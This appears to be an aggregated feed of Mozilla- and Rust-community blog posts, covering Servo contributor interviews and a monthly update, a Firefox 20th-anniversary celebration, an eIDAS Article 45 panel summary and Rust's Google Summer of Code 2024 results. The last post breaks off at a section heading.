Open source has offered me invaluable lessons that are hard to gain elsewhere. Working with people from around the world, I’ve learned effective collaboration practices that help us minimize disruptions and improve development quality. From code reviews, writing test cases, to clean code and refactoring practices, I’ve gained essential skills for producing maintainable, high quality code.

Q: What do you enjoy doing in your spare time when you’re not contributing to Mozilla?

I really enjoy reading and learning new things in my spare time. Books offer me a chance to grow, and I find it exciting to dive into new subjects. I also prioritize staying active with running and swimming to keep both my body and mind healthy. It’s a great balance that keeps me feeling refreshed and engaged.


Interested in contributing to performance tools like Jun? Check out our wiki to learn more.

The Servo BlogBehind the code: an interview with msub2

Behind the Code is a new series of interviews with the contributors who help propel Servo forward. Ever wondered why people choose to work on web browsers, or how they get started? We invite you to look beyond the project’s pull requests and issue reports, and get to know the humans who make it happen.


msub2

Some representative contributions:

Tell us about yourself!

My name is Daniel, though I more commonly go by my online handle “msub2”. I’m something of a generalist, but my primary interests are developing for the web, XR, and games. I created and run the WebXR Discord, which has members from both the Immersive Web Working Group and the Meta Browser team, among others. In my free time (when I’m not working, doing Servo things, or tending to my other programming projects) I’m typically watching videos from YouTube/Dropout/Nebula/etc and playing video games.

Why did you start contributing to Servo?

A confluence of interests, to put it simply. I was just starting to really get into Rust, having built a CHIP-8 emulator and an NES emulator to get my hands dirty, but I also had prior experience contributing to other browser projects like Chromium and Gecko. I was also eyeing Servo’s WebXR implementation (which I had submitted a couple small fixes for last year) as I could see there was still plenty of work that could be done there. To get started though, I looked for an adjacent area that I could work on to get familiar with the main Servo codebase, which led to my first contribution being support for non-XR gamepads!

What was challenging about your first contribution?

I’d say the most challenging part of my first contribution was twofold: the first was just getting oriented with how data flows in and out of Servo via the embedding API and the second was understanding how DOM structs, methods, and codegen all worked together in the script crate. Servo is a big project, but luckily I got lots of good help and feedback as I was working through it, which definitely made things easier. Looking at existing examples in the codebase of the things I was trying to do got me the rest of the way there I’d say.

What do you like about contributing to the project? What do you get out of it?

The thing I like most about Servo (and perhaps the web platform as an extension) is the amount of interesting problems that there are to solve when it comes to implementing/supporting all of its different features. While most of my contributions so far have been focused around Gamepad and WebXR, recently I’ve been working to help implement SubtleCrypto alongside another community member, which has been really interesting! In addition to the satisfaction I get just from being able to solve interesting problems, I also rather enjoy the feeling of contributing to a large, communal, open-source project.

Any final thoughts you’d like to share?

I’d encourage anyone who’s intrigued by the idea of contributing to Servo to give it a shot! The recent waves of attention for projects like Verso and Ladybird have shown that there is an appetite for new browsers and browser engines, and with Servo’s history it just feels right that it should finally be able to rise to a more prominent status in the ecosystem.

Don MartiLinks for 10 November 2024

Signal Is Now a Great Encrypted Alternative to Zoom and Google Meet These updates mean that Signal is now a free, robust, and secure video conferencing service that can hang with the best of them. It lets you add up to 50 people to a group call and there is no time limit on each call.

The New Alt Media and the Future of Publishing - Anil Dash

I’m a neuroscientist who taught rats to drive − their joy suggests how anticipating fun can enrich human life

Ecosia and Qwant, two European search engines, join forces

What can McCain’s Grand Prix win teach us? Nothing new Ever since Byron Sharp decided he was going for red for his book cover, marketing thinkers have assembled a quite extraordinary disciplinary playbook. And it’s one that looks nothing like the existing stuff that it replaced. Of course, the majority of marketers know nothing about any of it. They inhabit the murkier corners of marketing, where training is rejected because change is held up as a circuit-breaker for learning anything from the past. AI and the ‘new consumer’ mean everything we once knew is pointless now. Better to be ignorant and untrained than waste time on irrelevant historical stuff. But for those who know that is bullshit, who study, who respect marketing knowledge, who know the foundations do not change, the McCain case is a jewel sparkling with everything we have learned in these very fruitful 15 years.

The Counterculture Switch: creating in a hostile environment

Why Right-Wing Media Thrives While The Left Gets Left Behind

The Rogue Emperor, And What To Do About Them Anywhere there is an organisation or group that is centred around an individual, from the smallest organisation upwards, it’s possible for it to enter an almost cult-like state in which the leader both accumulates too much power, and loses track of some of the responsibilities which go with it. If it’s a tech company or a bowls club we can shrug our shoulders and move to something else, but when it occurs in an open source project and a benevolent dictator figure goes rogue it has landed directly on our own doorstep as the open-source community.

We need a Wirecutter for groceries

Historic calculators invented in Nazi concentration camp will be on exhibit at Seattle Holocaust center

One Company A/B Tested Hybrid Work. Here’s What They Found. According to the Society of Human Resource Management, each quit costs companies at least 50% of the employees’ annual salary, which for Trip.com would mean $30,000 for each quit. In Trip.com’s experiment, employees liked hybrid so much that their quit rates fell by more than a third — and saved the company millions of dollars a year.

Mozilla ThunderbirdVIDEO: Q&A with Mark Surman

Last month we had a great chat with two members of the Thunderbird Council, our community governance body. This month, we’re looking at the relationship between Thunderbird and our parent organization, MZLA, and the broader Mozilla Foundation. We couldn’t think of a better way to do this than sitting down for a Q&A with Mark Surman, president of the Mozilla Foundation.

We’d love to hear your suggestions for topics or guests for the Thunderbird Community Office Hours! You can always send them to officehours@thunderbird.org.

October Office Hours: Q&A with Mark Surman

In many ways, last month’s office hours was a perfect lead-in to this month’s, as our community and Mozilla have been big parts of the Thunderbird Story. Even though this year marks 20 years since Thunderbird 1.0, Thunderbird started as ‘Minotaur’ alongside ‘Phoenix,’ the original name for Firefox, in 2003. Heather, Monica, and Mark all discuss Thunderbird’s now decades-long journey, but this chat isn’t just about our past. We talk about what we hope is a a long future, and how and where we can lead the way.

If you’ve been a long-time user of Thunderbird, or are curious about how Thunderbird, MZLA, and the Mozilla Foundation all relate to each other, this video is for you.

Watch, Read, and Get Involved

We’re so grateful to Mark for joining us, and turning an invite during a chat at Mozweek into reality! We hope this video gives a richer context to Thunderbird’s past as it highlights one of the main characters in our long story.

VIDEO (Also on Peertube):

Thunderbird and Mozilla Resources:

The post VIDEO: Q&A with Mark Surman appeared first on The Thunderbird Blog.

Andrew HalberstadtJujutsu: A Haven for Mercurial Users at Mozilla

One of the pleasures of working at Mozilla, has been learning and using the Mercurial version control system. Over the past decade, I’ve spent countless hours tinkering my worfklow to be just so. Reading docs and articles, meticulously tweaking settings and even writing an extension.

I used to be very passionate about Mercurial. But as time went on, the culture at Mozilla started changing. More and more repos were created in Github, and more and more developers started using git-cinnabar to work on mozilla-central. Then my role changed and I found that 90% of my work was happening outside of mozilla-central and the Mercurial garden I had created for myself.

So it was with a sense of resigned inevitability that I took the news that Mozilla would be migrating mozilla-central to Git. The fire in me was all but extinguished, I was resigned to my fate. And what’s more, I had to agree. The time had come for Mozilla to officially make the switch.

Glandium wrote an excellent post outlining some of the history of the decisions made around version control, putting them into the context of the time. In that post, he offers some compelling wisdom to Mercurial holdouts like myself:

I’ll swim against the current here, and say this: the earlier you can switch to git, the earlier you’ll find out what works and what doesn’t work for you, whether you already know Git or not.

When I read that, I had to agree. But, I just couldn’t bring myself to do it. No, if I was going to have to give up my revsets and changeset obsolesence and my carefully curated workflows, then so be it. But damnit! I was going to continue using them for as long as possible.

And I’m glad I didn’t switch because then I stumbled upon Jujutsu.

The Servo BlogThis month in Servo: faster fonts, fetches, and flexbox!

Servo nightly showing new support for non-ASCII characters in <img srcset>, ‘transition-behavior: allow-discrete’, ‘mix-blend-mode: plus-lighter’, and ‘width: stretch’

Servo now supports ‘mix-blend-mode: plus-lighter’ (@mrobinson, #34057) and ‘transition-behavior: allow-discrete’ (@Loirooriol, #33991), including in the ‘transition’ shorthand (@Loirooriol, #34005), along with the fetch metadata request headers ‘Sec-Fetch-Site’, ‘Sec-Fetch-Mode’, ‘Sec-Fetch-User’, and ‘Sec-Fetch-Dest’ (@simonwuelker, #33830).

We now have partial support for the CSS size keywords ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ (@Loirooriol, #33558, #33659, #33854, #33951), including in floats (@Loirooriol, #33666), atomic inlines (@Loirooriol, #33737), and elements with ‘position: absolute’ or ‘fixed’ (@Loirooriol, #33950).

We’re implementing the SubtleCrypto API, starting with full support for crypto.subtle.digest() (@simonwuelker, #34034), partial support for generateKey() with AES-CBC and AES-CTR (@msub2, #33628, #33963), and partial support for encrypt(), and decrypt() with AES-CBC (@msub2, #33795).

More engine changes

Servo’s architecture is improving, with a new cross-process compositor API that reduces memory copy overhead for video (@mrobinson, @crbrz, #33619, #33660, #33817). We’ve also started phasing out our old OpenGL bindings (gleam and sparkle) in favour of glow, which should reduce Servo’s complexity and binary size (@sagudev, @mrobinson, surfman#318, webxr#248, #33538, #33910, #33911).

We’ve updated to Stylo 2024-10-04 (@Loirooriol, #33767) and wgpu 23 (@sagudev, #34073, #33819, #33635). The new version of wgpu includes several patches from @sagudev, adding support for const_assert, as well as accessing const arrays with runtime index values. We’ve also reworked WebGPU canvas presentation to ensure that we never use old buffers by mistake (@sagudev, #33613).

We’ve also landed a bunch of improvements to our DOM geometry APIs, with DOMMatrix now supporting toString() (@simonwuelker, #33792) and updating is2D on mutation (@simonwuelker, #33796), support for DOMRect.fromRect() (@simonwuelker, #33798), and getBounds() on DOMQuad now handling NaN correctly (@simonwuelker, #33794).

We now correctly handle non-ASCII characters in <img srcset> (@evuez, #33873), correctly handle data: URLs in more situations (@webbeef, #33500), and no longer throw an uncaught exception when pages try to use IntersectionObserver (@mrobinson, #33989).

Outreachy contributors are doing great work in Servo again, helping us land many of this month’s improvements to GC static analysis (@taniishkaa, @webbeef, @chickenleaf, @jdm, @jahielkomu, @wulanseruniati, @lauwwulan, #33692, #33706, #33800, #33774, #33816, #33808, #33827, #33822, #33820, #33828, #33852, #33843, #33836, #33865, #33862, #33891, #33888, #33880, #33902, #33892, #33893, #33895, #33931, #33924, #33917, #33921, #33958, #33920, #33973, #33960, #33928, #33985, #33984, #33978, #33975, #34003, #34002) and code health (@chickenleaf, @DileepReddyP, @taniishkaa, @mercybassey, @jahielkomu, @cashall-0, @tony-nyagah, @lwz23, @Noble14477, #33959, #33713, #33804, #33618, #33625, #33631, #33632, #33633, #33643, #33643, #33646, #33648, #33653, #33664, #33685, #33686, #33689, #33686, #33690, #33705, #33707, #33724, #33727, #33728, #33729, #33730, #33740, #33744, #33757, #33771, #33757, #33782, #33790, #33809, #33818, #33821, #33835, #33840, #33853, #33849, #33860, #33878, #33881, #33894, #33935, #33936, #33943).

Performance improvements

Our font system is faster now, with reduced latency when loading system fonts (@mrobinson, #33638), layout no longer blocking on sending font data to WebRender (@mrobinson, #33600), and memory mapped system fonts on macOS and FreeType platforms like Linux (@mrobinson, @mukilan, #33747).

Servo now has a dedicated fetch thread (@mrobinson, #33863). This greatly reduces the number of IPC channels we create for individual requests, and should fix crashes related to file descriptor exhaustion on some platforms. Brotli-compressed responses are also handled more efficiently, such that we run the parser with up to 8 KiB of decompressed data at a time, rather than only 10 bytes of compressed data at a time (@crbrz, #33611).

Flexbox layout now uses caching to avoid doing unnecessary work (@mrobinson, @Loirooriol, #33964, #33967), and now has experimental tracing-based profiling support (@mrobinson, #33647), which in turn no longer spams RUST_LOG=info when not enabled (@delan, #33845). We’ve also landed optimisations in table layout (@Loirooriol, #33575) and in our layout engine as a whole (@Loirooriol, #33806).

Work continues on making our massive script crate build faster, with improved incremental builds (@sagudev, @mrobinson, #33502) and further patches towards splitting script into smaller crates (@sagudev, @jdm, #33627, #33665).

We’ve also fixed several crashes, including when initiating a WebXR session on macOS (@jdm, #33962), when laying out replaced elements (@Loirooriol, #34006), when running JavaScript modules (@jdm, #33938), and in many situations when garbage collection occurs (@chickenleaf, @taniishkaa, @Loirooriol, @jdm, #33857, #33875, #33904, #33929, #33942, #33976, #34019, #34020, #33965, #33937).

servoshell, embedding, and devtools

Devtools support (--devtools 6080) is now compatible with Firefox 131+ (@eerii, #33661), and no longer lists iframes as if they were inspectable tabs (@eerii, #34032).

Servo-the-browser now avoids unnecessary redraws (@webbeef, #34008), massively reducing its CPU usage, and no longer scrolls too slowly on HiDPI systems (@nicoburns, #34063). We now update the location bar when redirects happen (@rwakulszowa, #34004), and these updates are sent to all embedders of Servo, not just servoshell.

We’ve added a new --unminify-css option (@Taym95, #33919), allowing you to dump the CSS used by a page like you can for JavaScript. This will pave the way for allowing you to modify that CSS for debugging site compat issues, which is not yet implemented.

We’ve also added a new --screen-size option that can help with testing mobile websites (@mrobinson, #34038), renaming the old --resolution option to --window-size, and we’ve removed --no-minibrowser mode (@Taym95, #33677).

We now publish nightly builds for OpenHarmony on servo.org (@mukilan, #33801). When running servoshell on OpenHarmony, we now display toasts when pages load or panic (@jschwe, #33621), and you can now pass certain Servo options via hdc shell aa start or a test app (@jschwe, #33588).

Donations

Thanks again for your generous support! We are now receiving 4201 USD/month (+1.3% over September) in recurring donations. We are no longer accepting donations on LFX — if you were donating there, please move your recurring donations to GitHub or Open Collective.

Servo is also on thanks.dev, and already ten GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

4201 USD/month
10000

With this money, we’ve been able to pay for a second Outreachy intern in this upcoming round, plus our web hosting and self-hosted CI runners for Windows and Linux builds. When the time comes, we’ll also be able to afford macOS runners and perf bots! As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conference talks

Support.Mozilla.OrgCelebrating our top contributors on Firefox’s 20th anniversary

Firefox was built by a group of passionate developers, and has been supported by a dedicated community of caring contributors since day one.

The SUMO platform was originally built in 2007 to provide an open-source community support channel for users, and to help us collaborate more effectively with our volunteer contributors.

Over the years, SUMO has become a powerful platform that helps users get the most out of Firefox, provides opportunities for users to connect and learn more from each other, and allows us to gather important insights – all powered by our community of contributors.

SUMO is not just a support platform but a place where other like-minded users, who care about making the internet a better place for everyone, can find opportunities to grow their skills and contribute.

Our contributor community has been integral to Firefox’s success. Contributors humanize the experience across our support channels, champion meaningful fixes and changes, and help us onboard the next generation of Firefox users (and potential contributors!).

Fun facts about our community:

  • We’re global! We have active contributors in 63 countries.
  • 6 active contributors have been with us since day one (Shout outs to Cor-el, jscher2000, James, mozbrowser, AliceWyman, and marsf) and 16 contributors have been here for 15+ years!
  • In 2024*, our contributor community responded to 18,390 forum inquiries, made 747 en-US revisions and 5,684 l10n revisions to our Knowledge Base, responded to 441 Tweets, and issued 1,296 Play Store review responses (*from Jan-Oct 2024 for Firefox desktop, Android, and iOS. Non OP and non staff)

Screenshot of the top contributors from Jan-Oct 2024

Chart reflects top contributors for Firefox (Desktop, Android, and iOS)

Highlights from throughout the years:

Started in October 2007, SUMO has evolved in many different ways, but its spirit remains the same. It supports our wider user community while also allowing us to build strong relationships with our contributors. Below is a timeline of some key moments in SUMO’s history:

  • 2 October 2007 – SUMO launched on TikiWiki. Knowledge Base was implemented in this initial phase, but article localization wasn’t supported until February 2008.
  • 18 December 2007 – Forum went live
  • 28 December 2007 – Live chat launched
  • 5 February 2009 – SUMO logo was introduced
  • 11 October 2010 – We expanded to Twitter (now X) supported by the Army of Awesome
  • December 2010 – SUMO migrated from TikiWiki to Kitsune. The migration was done in stages and lasted most of 2010.
  • 14 March 2021 – We expanded to take on Play Store support and consolidated our social support platforms in Conversocial/Verint
  • 9 November 2024 – Our SUMO channels are largely powered by active contributors across forums, Knowledge Base and social

We are so grateful for our active community of contributors who bring our mission to life every day. Special thanks to those of you who have been with us since the beginning.

And to celebrate this milestone, we are going to reward top contributors (>99 contributions) for all products in 2024 with a special SUMO badge. Additionally, contributors with more than 999 contributions throughout SUMO’s existence and those with >99 contributions in 2024 will be given swag vouchers to shop at Mozilla’s swag stores.

Cheers to the progress we’ve made, and the incredible foundation we’ve built together. The best is yet to come!

 

P.S. Thanks to Chris Ilias for additional note on SUMO's history.

Mozilla Privacy BlogJoin Us to Mark 20 Years of Firefox

You’re invited to Firefox’s 20th birthday!

 

We’re marking 20 years of Firefox — the independent open-source browser that has reshaped the way millions of people explore and experience the internet. Since its launch, Firefox has championed privacy, security, transparency, and put control back in the hands of people online.

Come celebrate two decades of innovation, advocacy, and community — while looking forward to what’s to come.

The post Join Us to Mark 20 Years of Firefox appeared first on Open Policy & Advocacy.

Mozilla Privacy BlogBehind the Scenes of eIDAS: A Look at Article 45 and Its Implications

On October 21, 2024, Mozilla hosted a panel discussion during the Global Encryption Summit to explore the ongoing debate around Article 45 of the eIDAS regulation. Moderated by Robin Wilton from the Internet Society, the panel featured experts Dennis Jackson from Mozilla, Alexis Hancock from Certbot at EFF, and Thomas Lohninger from epicenter.works. Our panelists provided their insights on the technical, legal, and privacy concerns surrounding Article 45 and the potential impact on internet security and privacy. The panel, facilitated by Mozilla in connection with its membership on the Global Encryption Coalition Steering Committee, was part of the annual celebration of Global Encryption Day on October 21.

What is eIDAS and Why is Article 45 Important?

The original eIDAS regulation, introduced in 2014, aimed to create a unified framework for secure electronic identification (eID) and trust services across the European Union. Such trust services, provided by designated Trust Service Providers (TSPs), included electronic signatures, timestamps, and website authentication certificates. Subsequently, Qualified Web Authentication Certificates (QWACs) were also recognized as a method to verify that the entity behind a website also controls the domain in an effort to increase trust amongst users that they are accessing a legitimate website.

Over the years, the cybersecurity community has expressed its concerns for users’ privacy and security regarding the use of QWACs, as they can lead to a false sense of security. Despite this criticism, in 2021, an updated EU proposal to the original law, in essence, aimed to mandate the recognition of QWACs as long as they were issued by qualified TSPs. This, in practice, would undermine decades of web security measures and put users’ privacy and security at stake.

The Security Risk Ahead campaign raised awareness and addressed these issues by engaging widely with policymakers and including through a public letter signed by more than 500 experts that was also endorsed by organizations including Internet Society, European Digital Rights (EDRi), EFF, and Epicenter.works among others.

The European Parliament introduced last-minute changes to mitigate risks of surveillance and fraud, but these safeguards now need to be technically implemented to protect EU citizens from potential exposure.

Technical Concerns and Security Risks

Thomas Lohninger provided context on how Article 45 fits into the larger eIDAS framework. He explained that while eIDAS aims to secure the wider digital ecosystem, QWACs under Article 45 could erode trust in website security, affecting both European and global users.

Dennis Jackson, a member of Mozilla’s cryptography team, cautioned that without robust safeguards, Qualified Website Authentication Certificates (QWACs) could be misused, leading to increased risk of fraud. He noted limited involvement of technical experts in drafting Article 45 resulted in significant gaps within the law. The version of Article 45, as originally proposed in 2021, radically expanded the capabilities of EU governments to surveil their citizens by ensuring that cryptographic keys under government control can be used to intercept encrypted web traffic across the EU.

Why Extended Validation Certificates (EVs) Didn’t Work—and Why Article 45 Might Not Either

Alexis Hancock compared Article 45 to extended validation (EV) certificates, which were introduced years ago with similar intentions but ultimately failed to achieve their goals. EV certificates were designed to offer more information about the identity of websites but ended up being expensive and ineffective as most users didn’t even notice them.

Hancock cautioned that QWACs could suffer from the same problems. Instead of focusing on complex authentication mechanisms, she argued, the priority should be on improving encryption and keeping the internet secure for everyone, regardless of whether a website has paid for a specific type of certificate.

Balancing Security and Privacy: A Tough Trade-Off

A key theme was balancing online transparency and protecting user privacy. All the panelists agreed that while identifying websites more clearly may have its advantages, it should not come at the expense of privacy and security. The risk is that requiring more authentication online could lead to reduced anonymity and greater potential for surveillance, undermining the principles of free expression and privacy on the internet.

The panelists also pointed out that Article 45 could lead to a fragmented internet, with different regions adopting conflicting rules for registering and asserting ownership of a website. This fragmentation would make it harder to maintain a secure and unified web, complicating global web security.

The Role of Web Browsers in Protecting Users

Web browsers, like Firefox, play a crucial role in protecting users. The panelists stressed that browsers have a responsibility to push back against policies that could compromise user privacy or weaken internet security.

Looking Ahead: What’s Next for eIDAS and Web Security?

Thomas Lohninger raised the possibility of legal challenges to Article 45. If the regulation is implemented in a way that violates privacy rights or data protection laws, it could be contested under the EU’s legal frameworks, including the General Data Protection Regulation (GDPR) and the ePrivacy Directive. Such battles could be lengthy and complex however, underscoring the need for continued advocacy.

As the panel drew to a close, the speakers emphasized that while the recent changes to Article 45 represent progress, the fight is far from over. The implementation of eIDAS continues to evolve, and it’s crucial that stakeholders, including browsers, cybersecurity experts, and civil society groups, remain vigilant in advocating for a secure and open internet.

The consensus from the panel was clear: as long as threats to encryption and web security exist, the community must stay engaged in these debates. Scrutinizing policies like eIDAS  is essential to ensure they truly serve the interests of internet users, not just large institutions or governments.

The panelists concluded by calling for ongoing collaboration between policymakers, technical experts, and the public to protect the open web and ensure that any changes to digital identity laws enhance, rather than undermine, security and privacy for all.


You can watch the panel discussion here.

The post Behind the Scenes of eIDAS: A Look at Article 45 and Its Implications appeared first on Open Policy & Advocacy.

The Rust Programming Language BlogGoogle Summer of Code 2024 results

As we have previously announced, the Rust Project participated in Google Summer of Code (GSoC) for the first time this year. Nine contributors have been tirelessly working on their exciting projects for several months. The projects had various durations; some of them have ended in August, while the last one has been concluded in the middle of October. Now that the final reports of all the projects have been submitted, we can happily announce that all nine contributors have passed the final review! That means that we have deemed all of their projects to be successful, even though they might not have fulfilled all of their original goals (but that was expected).

We had a lot of great interactions with our GSoC contributors, and based on their feedback, it seems that they were also quite happy with the GSoC program and that they had learned a lot. We are of course also incredibly grateful for all their contributions - some of them have even continued contributing after their project has ended, which is really awesome. In general, we think that Google Summer of Code 2024 was a success for the Rust Project, and we are looking forward to participating in GSoC (or similar programs) again in the near future. If you are interested in becoming a (GSoC) contributor, check out our project idea list.

Below you can find a brief summary of each of our GSoC 2024 projects, including feedback from the contributors and mentors themselves. You can find more information about the projects here.

Adding lint-level configuration to cargo-semver-checks

cargo-semver-checks is a tool designed for automatically detecting semantic versioning conflicts, which is planned to one day become a part of Cargo itself. The goal of this project was to enable cargo-semver-checks to ship additional opt-in lints by allowing users to configure which lints run in which cases, and whether their findings are reported as errors or warnings. Max achieved this goal by implementing a comprehensive system for configuring cargo-semver-checks lints directly in the Cargo.toml manifest file. He also extensively discussed the design with the Cargo team to ensure that it is compatible with how other Cargo lints are configured, and won't present a future compatibility problem for merging cargo-semver-checks into Cargo.

Predrag, who is the author of cargo-semver-checks and who mentored Max on this project, was very happy with his contributions that even went beyond his original project scope:

He designed and built one of our most-requested features, and produced design prototypes of several more features our users would love. He also observed that writing quality CLI and functional tests was hard, so he overhauled our test system to make better tests easier to make. Future work on cargo-semver-checks will be much easier thanks to the work Max put in this summer.

Great work, Max!

Implementation of a faster register allocator for Cranelift

The Rust compiler can use various backends for generating executable code. The main one is of course the LLVM backend, but there are other backends, such as GCC, .NET or Cranelift. Cranelift is a code generator for various hardware targets, essentially something similar to LLVM. The Cranelift backend uses Cranelift to compile Rust code into executable code, with the goal of improving compilation performance, especially for debug (unoptimized) builds. Even though this backend can already be faster than the LLVM backend, we have identified that it was slowed down by the register allocator used by Cranelift.

Register allocation is a well-known compiler task where the compiler decides which registers should hold variables and temporary expressions of a program. Usually, the goal of register allocation is to perform the register assignment in a way that maximizes the runtime performance of the compiled program. However, for unoptimized builds, we often care more about the compilation speed instead.

Demilade has thus proposed to implement a new Cranelift register allocator called fastalloc, with the goal of making it as fast as possible, at the cost of the quality of the generated code. He was very well-prepared, in fact he had a prototype implementation ready even before his GSoC project has started! However, register allocation is a complex problem, and thus it then took several months to finish the implementation and also optimize it as much as possible. Demilade also made extensive use of fuzzing to make sure that his allocator is robust even in the presence of various edge cases.

Once the allocator was ready, Demilade benchmarked the Cranelift backend both with the original and his new register allocator using our compiler benchmark suite. And the performance results look awesome! With his faster register allocator, the Rust compiler executes up to 18% less instructions across several benchmarks, including complex ones like performing a debug build of Cargo itself. Note that this is an end-to-end performance improvement of the time needed to compile a whole crate, which is really impressive. If you would like to examine the results in more detail or even run the benchmark yourself, check out Demilade's final report, which includes detailed instructions on how to reproduce the benchmark.

Apart from having the potential to speed up compilation of Rust code, the new register allocator can be also useful for other use-cases, as it can be used in Cranelift on its own (outside the Cranelift codegen backend). What can we can say other than we are very happy with Demilade's work! Note that the new register allocator is not yet available in the Cranelift codegen backend out-of-the-box, but we expect that it will eventually become the default choice for debug builds and that it will thus make compilation of Rust crates using the Cranelift backend faster in the future.

Improve Rust benchmark suite

This project was relatively loosely defined, with the overarching goal of improving the user interface of the Rust compiler benchmark suite. Eitaro tackled this challenge from various angles at once. He improved the visualization of runtime benchmarks, which were previously a second-class citizen in the benchmark suite, by adding them to our dashboard and by implementing historical charts of runtime benchmark results, which help us figure out how is a given benchmark behaving over a longer time span.

Another improvement that he has worked on was embedding a profiler trace visualizer directly within the rustc-perf website. This was a challenging task, which required him to evaluate several visualizers and figure out a way how to include them within the source code of the benchmark suite in a non-disruptive way. In the end, he managed to integrate Perfetto within the suite website, and also performed various optimizations to improve the performance of loading compilation profiles.

Last, but not least, Eitaro also created a completely new user interface for the benchmark suite, which runs entirely in the terminal. Using this interface, Rust compiler contributors can examine the performance of the compiler without having to start the rustc-perf website, which can be challenging to deploy locally.

Apart from the mentioned contributions, Eitaro also made a lot of other smaller improvements to various parts of the benchmark suite. Thank you for all your work!

Move cargo shell completions to Rust

Cargo's completion scripts have been hand maintained and frequently broken when changed. The goal for this effort was to have the completions automatically generated from the definition of Cargo's command-line, with extension points for dynamically generated results.

shanmu took the prototype for dynamic completions in clap (the command-line parser used by Cargo), got it working and tested for common shells, as well as extended the parser to cover more cases. They then added extension points for CLI's to provide custom completion results that can be generated on the fly.

In the next phase, shanmu added this to nightly Cargo and added different custom completers to match what the handwritten completions do. As an example, with this feature enabled, when you type cargo test --test= and hit the Tab key, your shell will autocomplete all the test targets in your current Rust crate! If you are interested, see the instructions for trying this out. The link also lists where you can provide feedback.

You can also check out the following issues to find out what is left before this can be stabilized:

Rewriting esoteric, error-prone makefile tests using robust Rust features

The Rust compiler has several test suites that make sure that it is working correctly under various conditions. One of these suites is the run-make test suite, whose tests were previously written using Makefiles. However, this setup posed several problems. It was not possible to run the suite on the Tier 1 Windows MSVC target (x86_64-pc-windows-msvc) and getting it running on Windows at all was quite challenging. Furthermore, the syntax of Makefiles is quite esoteric, which frequently caused mistakes to go unnoticed even when reviewed by multiple people.

Julien helped to convert the Makefile-based run-make tests into plain Rust-based tests, supported by a test support library called run_make_support. However, it was not a trivial "rewrite this in Rust" kind of deal. In this project, Julien:

  • Significantly improved the test documentation;
  • Fixed multiple bugs that were present in the Makefile versions that had gone unnoticed for years -- some tests were never testing anything or silently ignored failures, so even if the subject being tested regressed, these tests would not have caught that.
  • Added to and improved the test support library API and implementation; and
  • Improved code organization within the tests to make them easier to understand and maintain.

Just to give you an idea of the scope of his work, he has ported almost 250 Makefile tests over the span of his GSoC project! If you like puns, check out the branch names of Julien's PRs, as they are simply fantestic.

As a result, Julien has significantly improved the robustness of the run-make test suite, and improved the ergonomics of modifying existing run-make tests and authoring new run-make tests. Multiple contributors have expressed that they were more willing to work with the Rust-based run-make tests over the previous Makefile versions.

The vast majority of run-make tests now use the Rust-based test infrastructure, with a few holdouts remaining due to various quirks. After these are resolved, we can finally rip out the legacy Makefile test infrastructure.

Rewriting the Rewrite trait

rustfmt is a Rust code formatter that is widely used across the Rust ecosystem thanks to its direct integration within Cargo. Usually, you just run cargo fmt and you can immediately enjoy a properly formatted Rust project. However, there are edge cases in which rustfmt can fail to format your code. That is not such an issue on its own, but it becomes more problematic when it fails silently, without giving the user any context about what went wrong. This is what was happening in rustfmt, as many functions simply returned an Option instead of a Result, which made it difficult to add proper error reporting.

The goal of SeoYoung's project was to perform a large internal refactoring of rustfmt that would allow tracking context about what went wrong during reformatting. In turn, this would enable turning silent failures into proper error messages that could help users examine and debug what went wrong, and could even allow rustfmt to retry formatting in more situations.

At first, this might sound like an easy task, but performing such large-scale refactoring within a complex project such as rustfmt is not so simple. SeoYoung needed to come up with an approach to incrementally apply these refactors, so that they would be easy to review and wouldn't impact the entire code base at once. She introduced a new trait that enhanced the original Rewrite trait, and modified existing implementations to align with it. She also had to deal with various edge cases that we hadn't anticipated before the project started. SeoYoung was meticulous and systematic with her approach, and made sure that no formatting functions or methods were missed.

Ultimately, the refactor was a success! Internally, rustfmt now keeps track of more information related to formatting failures, including errors that it could not possibly report before, such as issues with macro formatting. It also has the ability to provide information about source code spans, which helps identify parts of code that require spacing adjustments when exceeding the maximum line width. We don't yet propagate that additional failure context as user facing error messages, as that was a stretch goal that we didn't have time to complete, but SeoYoung has expressed interest in continuing to work on that as a future improvement!

Apart from working on error context propagation, SeoYoung also made various other improvements that enhanced the overall quality of the codebase, and she was also helping other contributors understand rustfmt. Thank you for making the foundations of formatting better for everyone!

Rust to .NET compiler - add support for compiling & running cargo tests

As was already mentioned above, the Rust compiler can be used with various codegen backends. One of these is the .NET backend, which compiles Rust code to the Common Intermediate Language (CIL), which can then be executed by the .NET Common Language Runtime (CLR). This backend allows interoperability of Rust and .NET (e.g. C#) code, in an effort to bring these two ecosystems closer together.

At the start of this year, the .NET backend was already able to compile complex Rust programs, but it was still lacking certain crucial features. The goal of this GSoC project, implemented by Michał, who is in fact the sole author of the backend, was to extend the functionality of this backend in various areas. As a target goal, he set out to extend the backend so that it could be used to run tests using the cargo test command. Even though it might sound trivial, properly compiling and running the Rust test harness is non-trivial, as it makes use of complex features such as dynamic trait objects, atomics, panics, unwinding or multithreading. These features were especially tricky to implement in this codegen backend, because the LLVM intermediate representation (IR) and CIL have fundamental differences, and not all LLVM intrinsics have .NET equivalents.

However, this did not stop Michał. He has been working on this project tirelessly, implementing new features, fixing various issues and learning more about the compiler's internals every new day. He has also been documenting his journey with (almost) daily updates on Zulip, which were fascinating to read. Once he has reached his original goal, he moved the goalpost up to another level and attempted to run the compiler's own test suite using the .NET backend. This helped him uncover additional edge cases and also led to a refactoring of the whole backend that resulted in significant performance improvements.

By the end of the GSoC project, the .NET backend was able to properly compile and run almost 90% of the standard library core and std test suite. That is an incredibly impressive number, since the suite contains thousands of tests, some of which are quite arcane. Michał's pace has not slowed down even after the project has ended and he is still continuously improving the backend. Oh, and did we already mention that his backend also has experimental support for emitting C code, effectively acting as a C codegen backend?! Michał has been very busy over the summer.

We thank Michał for all his work on the .NET backend, as it was truly inspirational, and led to fruitful discussions that were relevant also to other codegen backends. Michał's next goal is to get his backend upstreamed and create an official .NET compilation target, which could open up the doors to Rust becoming a first-class citizen in the .NET ecosystem.

Sandboxed and deterministic proc macro using WebAssembly

